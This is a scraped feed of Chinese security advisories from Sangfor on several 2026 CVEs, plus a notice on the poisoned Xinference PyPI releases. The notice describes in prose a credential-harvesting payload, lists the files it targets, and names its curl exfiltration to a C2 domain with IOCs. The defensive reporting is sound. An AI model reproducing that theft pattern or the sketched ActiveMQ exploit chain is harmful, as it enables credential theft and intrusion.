目前受影响的LiteLLM版本:

1.81.16≤version<1.83.7

解决方案

官方修复建议

官方已发布最新版本修复该漏洞,建议受影响用户将litellm更新到1.83.7及以上版本。
下载链接:https://github.com/BerriAI/litellm/releases/tag/v1.83.7-stable

临时修复建议

  • 关闭未使用的功能模块,减少潜在攻击入口。

  • 遵循最小权限原则,严控各类敏感操作权限范围。

  • 非必要不暴露服务到公网,限制访问源为可信范围。

  • 定期更新系统及各类组件至安全版本,及时修补已知隐患。

深信服解决方案

1、风险资产发现

支持对LiteLLM的主动检测,可批量检出业务场景中该事件的受影响资产情况,相关产品如下:

【深信服云镜YJ】 已发布资产检测方案,指纹ID:0031936。

【深信服漏洞评估工具TSS】已发布资产检测方案,指纹ID:0031936。

2、漏洞主动检测

支持对LiteLLM SQL注入漏洞(CVE-2026-42208)的主动检测,可批量快速检出业务场景中是否存在漏洞风险,相关产品如下:

【深信服云镜YJ】预计2026年05月06日发布检测方案,规则ID:SF-2026-00905。

【深信服漏洞评估工具TSS】预计2026年05月30日发布检测方案,规则ID:SF-2026-01016。

【深信服安全托管服务MSS】预计2026年05月30日发布检测方案(需要具备TSS组件能力),规则ID:SF-2026-01016。

【深信服可拓展检测响应平台XDR】预计2026年05月06日发布检测方案(需要具备云镜组件能力),规则ID:SF-2026-00905。

3、漏洞安全监测

支持对LiteLLM SQL注入漏洞(CVE-2026-42208)的监测,可依据流量收集实时监控业务场景中的受影响资产情况,快速检查受影响范围,相关产品及服务如下:

【深信服安全感知管理平台SIP】预计2026年04月30日发布监测方案,规则ID:11220503。

【深信服安全托管服务MSS】预计2026年04月30日发布监测方案(需要具备SIP组件能力),规则ID:11220503。

【深信服可拓展检测响应平台XDR】预计2026年04月30日发布监测方案,规则ID:11220503。

【深信服流量检测GPT】流量检测GPT基于攻击理解、代码理解能力,不依赖规则即可检测该攻击威胁。

4、漏洞安全防护

支持对LiteLLM SQL注入漏洞(CVE-2026-42208)的防御,可阻断攻击者针对该事件的入侵行为,相关产品及服务如下:

【深信服下一代防火墙AF】预计2026年04月30日发布防护方案,规则ID:11220503。

【深信服Web应用防火墙WAF】预计2026年04月30日发布防护方案,规则ID:11220503。

【深信服安全托管服务MSS】预计2026年04月30日发布防护方案(需要具备AF组件能力),规则ID:11220503。

【深信服可拓展检测响应平台XDR】预计2026年04月30日发布防护方案(需要具备AF组件能力),规则ID:11220503。

参考链接

时间轴

2026/04/28

深瞳漏洞实验室监测到LiteLLM SQL注入漏洞信息。

2026/04/29

深瞳漏洞实验室发布漏洞通告。

点击阅读原文,及时关注并登录深信服智安全平台,可轻松查询漏洞相关解决方案。

阅读原文

跳转微信打开

]]> Wed, 29 Apr 2026 20:25:00 +0800 网络安全信息与动态周报2026年第17期(4月20日-4月26日) https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&mid=2247525429&idx=3&sn=81c972bbb2dae75573479374efa28eb1 分享一篇文章。 深信服千里目安全技术中心 2026-04-29 20:25 北京

分享一篇文章。

国家互联网应急中心CNCERT: 网络安全信息与动态周报2026年第17期(4月20日-4月26日)

本周,互联网网络安全态势整体评价为良。

本周网络安全基本态势

本周,互联网网络安全态势整体评价为良。我国互联网基础设施运行整体平稳,全国范围或省级行政区域内未发生造成重大影响的基础设施运行安全事件。针对政府、企业以及广大互联网用户的主要安全威胁来自于软件高危漏洞、恶意代码传播以及网站攻击。

本周事件处理情况

本周,CNCERT协调云服务商、域名注册服务机构、应用商店、各省分中心以及国际合作组织共处理网络安全事件254起,含跨境网络安全事件86起。其中,协调境内外域名注册机构、境外CERT等机构重点处理158起仿冒投诉事件。协调7个提供恶意移动应用程序下载服务的平台开展移动互联网恶意代码处理工作,共处理传播移动互联网恶意代码的恶意URL链接7个。

近期回顾

网络安全信息与动态周报2026年第16期(4月13日-4月19日)

网络安全信息与动态周报2026年第15期(4月6日-4月12日)

网络安全信息与动态周报2026年第14期(3月30日-4月5日)

网络安全信息与动态周报2026年第13期(3月23日-3月29日)

网络安全信息与动态周报2026年第12期(3月16日-3月22日)

跳转微信打开

]]> Wed, 29 Apr 2026 20:25:00 +0800 【恶意文件通告】Xinference供应链投毒 https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&mid=2247525409&idx=1&sn=0a13bb93d699cc80e341b74d5d9e6f6b 近期,深信服千里目安全技术中心监测到一起围绕Xinference开源推理框架的PyPI供应链投毒事件。 深瞻情报实验室 2026-04-24 20:29 北京

近期,深信服千里目安全技术中心监测到一起围绕Xinference开源推理框架的PyPI供应链投毒事件。根据xorbitsai/inference项目维护者于2026年4月22日在GitHub公开确认的信息,xinference的2.6.0、2.6.1、2.6.2版本已遭攻击者注入恶意代码并被紧急撤回,攻击起点并非仿冒包名,而是合法PyPI发布线被劫持,属于典型的合法软件供应链投毒事件。

恶意文件概要

事件名称

关于Xinference PyPI包的供应链投毒攻击

发布时间

2026424

威胁类型

PyPI发布线劫持、合法包投毒、凭据窃取、AI推理基础设施攻击

简单描述

攻击者通过盗用的维护者/发布凭据向PyPI正式发布线推送xinference 2.6.02.6.12.6.2三个恶意版本,在xinference/__init__.py中嵌入双层Base64混淆载荷,在importCLI/服务启动时后台派生子进程实施凭据窃取并外传至C2

关键特征

合法发布线被劫持;恶意代码位于__init__.py导入即触发;双层Base64 + subprocess.Popen分离执行;重点收集SSH、云IAMK8sDocker、包管理器令牌、.env、数据库、TLS和加密钱包等凭据;打包为love.tar.gz经带自定义头X-QT-SR: 14curl --data-binary外传至whereisitat.lucyatemysuperbox.space;样本含# hacked by teampcp标记,TeamPCP已公开否认负责。

事件详述

攻击背景与起因

近期,深信服千里目安全技术中心监测到一起围绕Xinference开源推理框架的PyPI供应链投毒事件。

根据xorbitsai/inference项目维护者于2026年4月22日在GitHub Issue #4828中的公开确认,攻击者已取得对合法PyPI发布线的实质控制能力,将xinference 2.6.0、2.6.1、2.6.2三个版本打上恶意载荷后直接通过官方发布通道分发。推断攻击者通过窃取维护者或CI凭据实现了对发布线的接管,但该路径目前尚未被官方完全闭环确认。

影响范围与风险分析

根据项目官方公告与JFrog、OX Security等第三方研究分析,这次事件的核心影响不在于攻击者是否直接篡改Xinference项目代码仓库,而在于其能够通过合法的PyPI发布线将凭据窃取木马静默植入大量AI推理节点,并由此形成对云平台、代码托管、包仓库和数据库等多类下游资产的级联外泄风险。

  • 受影响范围: PyPI上xinference 2.6.0、2.6.1、2.6.2三个版本,上传时间集中在2026年4月22日前后,已由项目方紧急yank;目前PyPI最新安全版本为2.5.0(发布于2026年4月12日前后)。

  • 暴露数据: 样本重点收集Linux主机上的SSH私钥与主机密钥、AWS/GCP/Azure云凭据与IMDSv2角色令牌、Kubernetes kubeconfig与service account token、Docker认证、npm/PyPI/Cargo发布令牌、.env与.gitconfig机密、数据库与邮件配置、Terraform状态、WireGuard与Helm数据、TLS私钥及Bitcoin/Ethereum/Solana/Cardano/Monero等加密钱包文件。

  • 级联风险: 由于Xinference天然部署在富含云凭据与模型资源的AI基础设施中,一旦导入即可能在极短时间内外传大量高价值凭据,进而引发云账号接管、K8s接管、包仓库二次投毒、源码泄露、数据库外泄与资金类欺诈等级联后果。

受影响场景

本次事件主要影响在Linux服务器、GPU推理节点、Kubernetes节点、容器构建机、CI Runner或云主上安装并入过受影响版本的AI/ML团队、平台运维团队与自托管推理服务运营方,尤其是将以下资产直接置于Xinference部署环境中的场景:

  • ~/.ssh/id_rsa 与 /etc/ssh/ssh_host_*_key

  • ~/.aws/credentials、~/.aws/config 与IMDSv2角色令牌

  • ~/.kube/config、

    /var/run/secrets/kubernetes.io/serviceaccount/token

  • ~/.docker/config.json、~/.npmrc、~/.pypirc、

    ~/.cargo/credentials.toml

  • .env、.env.local、.env.production、.git-credentials

  • .pgpass、.my.cnf、redis.conf、postfix sasl_passwd、terraform.tfvars、terraform.tfstate

  • .pem、.key、.p12、.pfx等TLS与证书私钥材料,以及加密货币钱包与keystore

时公开情报显示本次事件未出现针对官方Docker镜像的大规模成功投毒证据,已落地的供应链影响目前主要集中在PyPI发布线。

攻击时间线

时间

事件

详细说明

2025/10

维护者关联机器人异常

XprobeBot机器人账号开始出现异常活动,随后被怀疑是未经授权上传PyPI包的关键切入点。

2025/12

CI/CD风险披露期

JFrog研究员报告xorbitsai/inference仓库GitHub Actions存在pull_request_target命令注入风险,可理论上导致PYPI_PASSWORDDOCKERHUB_PASSWORD等机密泄露并形成供应链后果。

2026/1/25

GitHub公开披露CI/CD漏洞

xorbitsai/inference仓库Issue #4528公开说明该命令注入与仓库接管风险,影响可延伸至PyPIDockerHub发布链,随后被标记为通过PR修复,但与本次4月投毒的直接因果关系尚未被官方闭环。

2026/4/12

正版2.5.0发布

维护者按正常流程在PyPI发布xinference 2.5.0(目前仍为推荐安全版本)。

2026/4/22

恶意版本上传

XprobeBot账号将Base64混淆恶意载荷写入xinference/__init__.py,并以2.6.02.6.12.6.2三个版本推送至PyPIGitHub侧无对应标签或提交。

2026/4/22

社区发现异常行为

用户在安装xinference 2.6.2后发现服务出现异常行为,包括在服务器上执行与密码相关的grep动作,并在GitHub Issue #4828告警。

2026/4/22

官方确认遭攻击并撤回

项目维护者在Issue #4828明确回复"Yes, we are under attack, we have just yanked those versions."JFrog当日发布详细分析并纳入Xray (XRAY-96896)OX Security发布独立确认。

2026/4/22

TeamPCP公开否认

TeamPCP通过X账号@pcpcats公开否认参与本次事件

技术特征与攻击行为分析

投毒载体与进入方式

本次事件并非攻击者在Xinference官方源码仓库、提交历史或构建流水线中植入恶意代码,而是典型的"合法PyPI发布线劫持"。

恶意代码仅被注入在xinference/__init__.py中,这意味着只要用户执行import xinference、通过CLI启动服务,载荷就会自动执行。根据JFrog分析,第一阶段为高度混淆的Base64字节串,运行时解码并通过subprocess.Popen派生一个独立的后台Python解释器,将stdout/stderr全部压制;第一阶段再解码第二阶段采集器并通过标准输入喂给子进程,把采集结果写入临时文件、压缩为love.tar.gz后外传,随即清理临时痕迹。

信息收集目标

潜在暴露对象包括:

  • 主机画像信息: hostname, pwd, whoami, uname -a, ip addr / ifconfig, ip route, printenv

  • SSH密钥与主机密钥: ~/.ssh/id_rsa, /etc/ssh/ssh_host_*_key

  • 云平台凭据: ~/.aws/credentials, ~/.aws/config, GCP配置, IMDSv2角色令牌, AWS Secrets Manager ListSecrets 与 SSM DescribeParameters枚举

  • Kubernetes凭据: ~/.kube/config, /var/run/secrets/kubernetes.io/serviceaccount/token

  • 容器与包管理凭据: ~/.docker/config.json, ~/.npmrc, ~/.pypirc, ~/.cargo/credentials.toml

  • Git与源码凭据: ~/.git-credentials, ~/.gitconfig

  • 环境变量与机密文件: .env, .env.local, .env.production

  • 基础设施配置: terraform.tfvars, terraform.tfstate, WireGuard, Helm

  • 证书与TLS材料: .pem, .key, .p12, .pfx

  • 加密货币钱包: 比特币、以太坊keystore、Solana validator keypair、Cardano、Monero等

  • Shell历史与系统账号信息: .bash_history, .zsh_history, /etc/passwd, /etc/shadow

  • 应用类Webhook与API密钥: Slack/Discord Webhook, JSON/配置文件中的各类API Key

这些凭据一旦外泄,可能被用于数据窃取、会话伪造、云资源接管、Kubernetes接管、包仓库二次投毒、源代码泄露、数据库外泄、资金类欺诈和加密货币盗取,甚至进一步实施真正的下游软件供应链投毒。

持久化与横向移动能力

由于AI推理环境通常持有跨云、跨项目的高权限凭据,样本外泄的数据具备天然的横向移动潜力:一份被窃的AWS IAM密钥可能直接打开云账号;一份被窃的K8s service account token可能直接接管集群;一份被窃的PyPI/npm/Cargo令牌则可能被攻击者用于对下游其它开源项目再次实施供应链投毒,形成链式放大。

解决方案

建议处置流程

1. 识别影响主机:梳理所有安装或运行过xinference 2.6.0/2.6.1/2.6.2的主机、容器与CI环境。

2. 保全取证证据: 处置前先保留日志、pip缓存、site-packages目录与DNS/代理审计记录。

3. 按优先级轮换凭据: 立即轮换SSH密钥、云IAM凭据、K8s令牌、Docker/PyPI/npm/Cargo令牌、数据库密码与.env机密。

4. 核查下游访问日志:回溯云平台、代码托管与包仓库的访问记录,排查异常登录、令牌滥用与可疑外连。

5. 审计CI/CD与发布凭据: 清理xorbitsai/inference相关GitHub Actions权限、PYPI_PASSWORD等机密与不再使用的机器人账号。

6. 强化安全配置: 在PyPI、GitHub及维护者账号启用MFA,使用依赖锁定与SBOM工具持续扫描。

IOC

e1e007ce4eab7774785617179d1c01a9381ae83abfd431aae8dba6f82d3ac127

077d49fa708f498969d7cdffe701eb64675baaa4968ded9bd97a4936dd56c21c

fe17e2ea4012d07d90ecb7793c1b0593a6138d25a9393192263e751660ec3cd0

whereisitat.lucyatemysuperbox.space

hxxps://whereisitat.lucyatemysuperbox.space/

MITRE ATT&CK:

Tactic

Technique

ID

Application

Initial Access

Supply Chain Compromise: Compromise Software Supply Chain

T1195.002

恶意代码通过合法PyPI发布线推送至xinference 2.6.0/2.6.1/2.6.2

Execution

Command and Scripting Interpreter: Python

T1059.006

__init__.py中双层Base64载荷导入即执行

DefenseEvasion

Obfuscated Files or Information

T1027

双层Base64混淆 + subprocess.Popen分离 + stdout/stderr压制

Defense Evasion

Indicator Removal: File Deletion

T1070.004

采集完成后清理临时文件与love.tar.gz

Credential Access

Unsecured Credentials: Credentials In Files

T1552.001

递归读取.env.aws/credentials.kube/config等凭据文件

Credential Access

Unsecured Credentials: Private Keys

T1552.004

收集SSH私钥、TLS私钥、加密钱包keystore

Credential Access

Cloud Instance Metadata API

T1552.005

获取AWS IMDSv2令牌及IAM角色凭据

Discovery

System Information Discovery

T1082

hostname / uname -a / ip addr 等主机画像命令

Discovery

Cloud Service Discovery

T1526

AWS Secrets Manager ListSecretsSSM DescribeParameters枚举

Collection

Data from Local System

T1005

广泛递归扫描本地凭据、配置与密钥材料

Exfiltration

Exfiltration Over Web Service

T1567

curl --data-binary外传love.tar.gzC2

Exfiltration

Exfiltration Over C2 Channel

T1041

通过自定义HTTPX-QT-SR: 14标识通信

参考链接

跳转微信打开

]]> Fri, 24 Apr 2026 20:29:00 +0800 【漏洞通告】FortiSandbox目录遍历漏洞(CVE-2026-39813) https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&mid=2247525409&idx=2&sn=59c0589b623e6dab519fe3c291a01d44 2026年4月23日,深瞳漏洞实验室监测到一则FortiSandbox组件存在目录遍历漏洞的信息,漏洞编号:CVE-2026-39813,漏洞威胁等级:高危。 深瞳漏洞实验室 2026-04-24 20:29 北京

2026年4月23日,深瞳漏洞实验室监测到一则FortiSandbox组件存在目录遍历漏洞的信息,漏洞编号:CVE-2026-39813,漏洞威胁等级:高危。

漏洞名称:

FortiSandbox目录遍历漏洞(CVE-2026-39813)

组件名称:

FortiSandbox

影响范围:

5.0.0 ≤=FortiSandbox≤= 5.0.5  

4.4.0 ≤=FortiSandbox≤= 4.4.8

漏洞类型:

目录遍历

利用条件:

1、用户认证:无需用户认证

2、前置条件:默认配置

3、触发方式:远程

综合评价:

<综合评定利用难度>:容易,无需授权即可造成敏感信息泄露。

<综合评定威胁等级>:高危,能够造成敏感信息泄露。

官方解决方案:

已发布

漏洞分析

组件介绍

Fortinet FortiSandbox 是一款先进的沙箱技术,旨在通过动态分析检测和防御未知的恶意软件和攻击。它能够有效地模拟攻击环境并捕捉潜在威胁,提升网络安全性。

漏洞简介

2026年4月23日,深瞳漏洞实验室监测到一则FortiSandbox组件存在目录遍历漏洞的信息,漏洞编号:CVE-2026-39813,漏洞威胁等级:高危。

Fortinet FortiSandbox 5.0.0 至 5.0.5 和 4.4.0 至 4.4.8 包含因错误输入验证导致的路径遍历,允许攻击者通过精心设计的路径穿越提升权限,利用漏洞则要求攻击者发送精心设计的请求。

影响范围

目前受影响的FortiSandbox版本:

5.0.0 ≤FortiSandbox≤ 5.0.5  

4.4.0 ≤FortiSandbox≤ 4.4.8

解决方案

官方修复建议

官方已发布最新版本修复该漏洞,建议受影响用户将FortiSandbox5.0升级到5.0.6或更高版本,FortiSandbox升级到4.4.9或更高版本。https://fortiguard.fortinet.com/psirt/FG-IR-26-112

临时修复建议

  • 关闭未使用的功能模块,减少潜在攻击入口。

  • 遵循最小权限原则,严控各类敏感操作权限范围。

  • 非必要不暴露服务到公网,限制访问源为可信范围。

  • 定期更新系统及各类组件至安全版本,及时修补已知隐患。

深信服解决方案

1、漏洞安全监测

支持对FortiSandbox目录遍历漏洞(CVE-2026-39813)的监测,可依据流量收集实时监控业务场景中的受影响资产情况,快速检查受影响范围,相关产品及服务如下:

【深信服安全感知管理平台SIP】预计2026年05月06日发布监测方案,规则ID:11220421。

【深信服安全托管服务MSS】预计2026年05月06日发布监测方案(需要具备SIP组件能力),规则ID:11220421。

【深信服可拓展检测响应平台XDR】预计2026年05月06日发布监测方案,规则ID:11220421。

2、漏洞安全防护

支持对FortiSandbox目录遍历漏洞(CVE-2026-39813)的防御,可阻断攻击者针对该事件的入侵行为,相关产品及服务如下:

【深信服下一代防火墙AF】预计2026年05月06日发布防护方案,规则ID:11220421。

【深信服Web应用防火墙WAF】预计2026年05月06日发布防护方案,规则ID:11220421。

【深信服安全托管服务MSS】预计2026年05月06日发布防护方案(需要具备AF组件能力),规则ID:11220421。

【深信服可拓展检测响应平台XDR】预计2026年05月06日发布防护方案(需要具备AF组件能力),规则ID:11220421。

参考链接

时间轴

2026/04/23

深瞳漏洞实验室监测到FortiSandbox目录遍历漏洞信息。

2026/04/24

深瞳漏洞实验室发布漏洞通告。

点击阅读原文,及时关注并登录深信服智安全平台,可轻松查询漏洞相关解决方案。

阅读原文

跳转微信打开

]]> Fri, 24 Apr 2026 20:29:00 +0800 【漏洞通告】Apache ActiveMQ 远程代码执行漏洞(CVE-2026-40466) https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&mid=2247525409&idx=3&sn=7d8ac68421247c6192fa11298fc0c3eb 2026年4月24日,深瞳漏洞实验室监测到一则Apache ActiveMQ组件存在代码执行漏洞的信息,漏洞编号:CVE-2026-40466,漏洞威胁等级:高危。 深瞳漏洞实验室 2026-04-24 20:29 北京

2026年4月24日,深瞳漏洞实验室监测到一则Apache ActiveMQ组件存在代码执行漏洞的信息,漏洞编号:CVE-2026-40466,漏洞威胁等级:高危。

漏洞名称:

Apache ActiveMQ 远程代码执行漏洞(CVE-2026-40466)

组件名称:

Apache ActiveMQ

影响范围:

Apache ActiveMQ < 5.19.6

6.0.0 ≤ Apache ActiveMQ< 6.2.5

Apache ActiveMQ Broker < 5.19.6

6.0.0 ≤ Apache ActiveMQ Broker < 6.2.5

Apache ActiveMQ All < 5.19.6

6.0.0 ≤ Apache ActiveMQ All < 6.2.5

漏洞类型:

代码执行

利用条件:

1、用户认证:需要用户认证

2、前置条件:默认配置

3、触发方式:远程

综合评价:

<综合评定利用难度>:困难,需要认证。

<综合评定威胁等级>:高危,能造成远程代码执行。

官方解决方案:

已发布

漏洞分析

组件介绍

Apache ActiveMQ 是最流行的开源、多协议、基于 Java 的消息代理。它支持行业标准协议,因此用户可以从多种语言和平台的客户端选择中受益。从使用 JavaScript、C、C++、Python、.Net 等编写的客户端进行连接。

漏洞简介

2026年4月24日,深瞳漏洞实验室监测到一则Apache ActiveMQ组件存在代码执行漏洞的信息,漏洞编号:CVE-2026-40466,漏洞威胁等级:高危。

Apache ActiveMQ Broker、Apache Active MQ All和Apache ActiveMQ中的输入验证不正确、代码生成控制不正确代码注入漏洞。如果ActiveMQ HTTP模块在类路径上,则经过身份验证的攻击者可以通过BrokerView.addNetworkConnector或BrokerView.addConnector通过Jolokia使用HTTP Discovery传输添加连接器,从而绕过CVE-2026-34197中的修复。恶意HTTP端点可以通过HTTP URI返回VM传输,这将绕过CVE-2026-34197中添加的验证。然后,攻击者可以使用VM传输的BrokerConfig参数来使用ResourceXmlApplicationContext加载远程Spring XML应用程序上下文。

影响范围

目前受影响的Apache ActiveMQ版本:

Apache ActiveMQ < 5.19.6

6.0.0 ≤ Apache ActiveMQ < 6.2.5

Apache ActiveMQ Broker < 5.19.6

6.0.0 ≤ Apache ActiveMQ Broker < 6.2.5

Apache ActiveMQ All < 5.19.6

6.0.0 ≤ Apache ActiveMQ All < 6.2.5

解决方案

官方修复建议

官方已发布最新版本修复该漏洞,建议受影响用户将Apache ActiveMQ升级到最新版本。
下载链接:https://activemq.apache.org/download.html

临时修复建议

  • 关闭未使用的功能模块,减少潜在攻击入口。

  • 遵循最小权限原则,严控各类敏感操作权限范围。

  • 非必要不暴露服务到公网,限制访问源为可信范围。

  • 定期更新系统及各类组件至安全版本,及时修补已知隐患。

深信服解决方案

1、风险资产发现

支持对Apache ActiveMQ的主动检测,可批量检出业务场景中该事件的受影响资产情况,相关产品如下:

【深信服云镜YJ】 已发布资产检测方案,指纹ID:0007260。

【深信服漏洞评估工具TSS】已发布资产检测方案,指纹ID:0007260。

2、漏洞主动检测

支持对Apache ActiveMQ 远程代码执行漏洞(CVE-2026-40466)的主动检测,可批量快速检出业务场景中是否存在漏洞风险,相关产品如下:

【深信服云镜YJ】预计2026年04月26日发布检测方案,规则ID:SF-2026-00904。

【深信服漏洞评估工具TSS】预计2026年05月30日发布检测方案,规则ID:SF-2026-01015。

【深信服安全托管服务MSS】预计2026年05月30日发布检测方案(需要具备TSS组件能力),规则ID:SF-2026-01015。

【深信服可拓展检测响应平台XDR】预计2026年04月26日发布检测方案(需要具备云镜组件能力),规则ID:SF-2026-00904。

3、漏洞安全监测

支持对Apache ActiveMQ 远程代码执行漏洞(CVE-2026-40466)的监测,可依据流量收集实时监控业务场景中的受影响资产情况,快速检查受影响范围,相关产品及服务如下:

【深信服安全感知管理平台SIP】预计2026年05月08日发布监测方案,规则ID:11220422。

【深信服安全托管服务MSS】预计2026年05月08日发布监测方案(需要具备SIP组件能力),规则ID:11220422。

【深信服可拓展检测响应平台XDR】预计2026年05月08日发布监测方案,规则ID:11220422。

4、漏洞安全防护

支持对Apache ActiveMQ 远程代码执行漏洞(CVE-2026-40466)的防御,可阻断攻击者针对该事件的入侵行为,相关产品及服务如下:

【深信服下一代防火墙AF】预计2026年05月08日发布防护方案,规则ID:11220422。

【深信服Web应用防火墙WAF】预计2026年05月08日发布防护方案,规则ID:11220422。

【深信服安全托管服务MSS】预计2026年05月08日发布防护方案(需要具备AF组件能力),规则ID:11220422。

【深信服可拓展检测响应平台XDR】预计2026年05月08日发布防护方案(需要具备AF组件能力),规则ID:11220422。

参考链接

时间轴

2026/04/24

深瞳漏洞实验室监测到Apache ActiveMQ 远程代码执行漏洞信息。

2026/04/24

深瞳漏洞实验室发布漏洞通告。

点击阅读原文,及时关注并登录深信服智安全平台,可轻松查询漏洞相关解决方案。

阅读原文

跳转微信打开

]]> Fri, 24 Apr 2026 20:29:00 +0800 网络安全信息与动态周报2026年第16期(4月13日-4月19日) https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&mid=2247525409&idx=4&sn=44e552e0b424ae3cdd85d3563499791a 分享一篇文章。 深信服千里目安全技术中心 2026-04-24 20:29 北京

分享一篇文章。

国家互联网应急中心CNCERT: 网络安全信息与动态周报2026年第16期(4月13日-4月19日)

本周,互联网网络安全态势整体评价为良。

本周网络安全基本态势

本周,互联网网络安全态势整体评价为良。我国互联网基础设施运行整体平稳,全国范围或省级行政区域内未发生造成重大影响的基础设施运行安全事件。针对政府、企业以及广大互联网用户的主要安全威胁来自于软件高危漏洞、恶意代码传播以及网站攻击。

本周事件处理情况

本周,CNCERT协调云服务商、域名注册服务机构、应用商店、各省分中心以及国际合作组织共处理网络安全事件248起,含跨境网络安全事件56起。其中,协调境内外域名注册机构、境外CERT等机构重点处理151起仿冒投诉事件。协调5个提供恶意移动应用程序下载服务的平台开展移动互联网恶意代码处理工作,共处理传播移动互联网恶意代码的恶意URL链接5个。

近期回顾

网络安全信息与动态周报2026年第15期(4月6日-4月12日)

网络安全信息与动态周报2026年第14期(3月30日-4月5日)

网络安全信息与动态周报2026年第13期(3月23日-3月29日)

网络安全信息与动态周报2026年第12期(3月16日-3月22日)

网络安全信息与动态周报2026年第11期(3月9日-3月15日)

跳转微信打开

]]> Fri, 24 Apr 2026 20:29:00 +0800 【漏洞通告】FortiClientEMS绕过认证漏洞(CVE-2026-35616) https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&mid=2247525367&idx=1&sn=e73780f0f75d9788028f066f5abdcb82 2026年4月21日,FortiClient-Enterprise-Management-Server组件披露绕过认证漏洞,漏洞编号:CVE-2026-35616,漏洞威胁等级:高危。 深瞳漏洞实验室 2026-04-22 15:32 北京

2026年4月21日,FortiClient-Enterprise-Management-Server组件披露绕过认证漏洞,漏洞编号:CVE-2026-35616,漏洞威胁等级:高危。

漏洞名称:

FortiClientEMS绕过认证漏洞(CVE-2026-35616)

组件名称:

FortiClient-Enterprise-Management-Server

影响范围:

7.4.5≤ FortiClientEMS ≤7.4.6

漏洞类型:

绕过认证

利用条件:

1、用户认证:无需用户认证

2、前置条件:默认配置

3、触发方式:远程

综合评价:

<综合评定利用难度>:容易,无需授权即可泄露敏感信息。

<综合评定威胁等级>:高危,可造成信息泄露。

官方解决方案:

已发布

漏洞分析

组件介绍

FortiClient-Enterprise-Management-Server是一款企业级管理服务器软件。它可以帮助企业管理和监控FortiClient终端设备,包括安全策略、软件更新、远程访问等。FortiClient-Enterprise-Management-Server提供了一个集中化的管理平台,使得企业可以更加高效地管理和保护其网络安全。此外,该软件还提供了实时监控和报告功能,帮助企业及时发现和解决网络安全问题。

漏洞简介

2026年4月21日,深瞳漏洞实验室监测到一则FortiClient-Enterprise-Management-Server组件存在绕过认证漏洞的信息,漏洞编号:CVE-2026-35616,漏洞威胁等级:高危。

Fortinet FortiClient EMS 存在 API 身份验证和授权绕过漏洞,攻击者可以通过向目标服务器发送精心构造的请求,利用其内部微服务路由及通信间的鉴权缺陷,绕过前端身份验证机制;在无需提供有效认证凭据的情况下,攻击者可直接越权访问并调用后端核心 API 接口,进而对系统配置、端点策略或敏感数据执行未经授权的读取与修改等恶意操作。

影响范围

目前受影响的FortiClient-Enterprise-Management-Server版本:

7.4.5≤ FortiClientEMS ≤7.4.6

解决方案

官方修复建议

官方已发布补丁修复该漏洞,建议受影响用户将FortiClient EMS 7.4.5 和 7.4.6版本进行热修复。
下载链接:
https://docs.fortinet.com/document/forticlient/7.4.5/ems-release-notes/832484 - 适用于FortiClientEMS 7.4.5
https://docs.fortinet.com/document/forticlient/7.4.6/ems-release-notes/832484 - for FortiClientEMS 7.4.6

临时修复建议

  • 关闭未使用的功能模块,减少潜在攻击入口。

  • 遵循最小权限原则,严控各类敏感操作权限范围。

  • 非必要不暴露服务到公网,限制访问源为可信范围。

  • 定期更新系统及各类组件至安全版本,及时修补已知隐患。

深信服解决方案

1、风险资产发现

支持对FortiClient-Enterprise-Management-Server的主动检测,可批量检出业务场景中该事件的受影响资产情况,相关产品如下:

【深信服云镜YJ】 已发布资产检测方案,指纹ID:0028448。

【深信服漏洞评估工具TSS】已发布资产检测方案,指纹ID:0028448。

2、漏洞主动检测

支持对FortiClientEMS绕过认证漏洞(CVE-2026-35616)的主动检测,可批量快速检出业务场景中是否存在漏洞风险,相关产品如下:

【深信服云镜YJ】预计2026年04月26日发布检测方案,规则ID:SF-2026-00903。

【深信服漏洞评估工具TSS】预计2026年05月30日发布检测方案,规则ID:SF-2026-01014。

【深信服安全托管服务MSS】预计2026年05月30日发布检测方案(需要具备TSS组件能力),规则ID:SF-2026-01014。

【深信服可拓展检测响应平台XDR】预计2026年04月26日发布检测方案(需要具备云镜组件能力),规则ID:SF-2026-00903。

3、漏洞安全监测

支持对FortiClientEMS绕过认证漏洞(CVE-2026-35616)的监测,可依据流量收集实时监控业务场景中的受影响资产情况,快速检查受影响范围,相关产品及服务如下:

【深信服安全感知管理平台SIP】预计2026年04月24日发布监测方案,规则ID:11220409。

【深信服安全托管服务MSS】预计2026年04月24日发布监测方案(需要具备SIP组件能力),规则ID:11220409。

【深信服可拓展检测响应平台XDR】预计2026年04月24日发布监测方案,规则ID:11220409。

4、漏洞安全防护

支持对FortiClientEMS绕过认证漏洞(CVE-2026-35616)的防御,可阻断攻击者针对该事件的入侵行为,相关产品及服务如下:

【深信服下一代防火墙AF】预计2026年04月24日发布防护方案,规则ID:11220409。

【深信服Web应用防火墙WAF】预计2026年04月24日发布防护方案,规则ID:11220409。

【深信服安全托管服务MSS】预计2026年04月24日发布防护方案(需要具备AF组件能力),规则ID:11220409。

【深信服可拓展检测响应平台XDR】预计2026年04月24日发布防护方案(需要具备AF组件能力),规则ID:11220409。

参考链接

时间轴

2026/04/21

深瞳漏洞实验室监测到FortiClientEMS绕过认证漏洞信息。

2026/04/22

深瞳漏洞实验室发布漏洞通告。

点击阅读原文,及时关注并登录深信服智安全平台,可轻松查询漏洞相关解决方案。

阅读原文

跳转微信打开

]]> Wed, 22 Apr 2026 15:32:00 +0800 【漏洞通告】Nginx UI MCP接口绕过认证漏洞(CVE-2026-33032) https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&mid=2247525356&idx=1&sn=937dcf233c3dd1df9a2d77f81c9a211b 2026年4月16日,深瞳漏洞实验室监测到一则Nginx UI组件存在绕过认证漏洞的信息,漏洞编号:CVE-2026-33032,漏洞威胁等级:高危。 深瞳漏洞实验室 2026-04-17 16:37 北京

2026年4月16日,深瞳漏洞实验室监测到一则Nginx UI组件存在绕过认证漏洞的信息,漏洞编号:CVE-2026-33032,漏洞威胁等级:高危。

漏洞名称:

Nginx UI MCP接口绕过认证漏洞(CVE-2026-33032)

组件名称:

Nginx UI

影响范围:

Nginx UI ≤ 2.3.5

漏洞类型:

绕过认证

利用条件:

1、用户认证:不需要用户认证

2、前置条件:默认配置

3、触发方式:远程

综合评价:

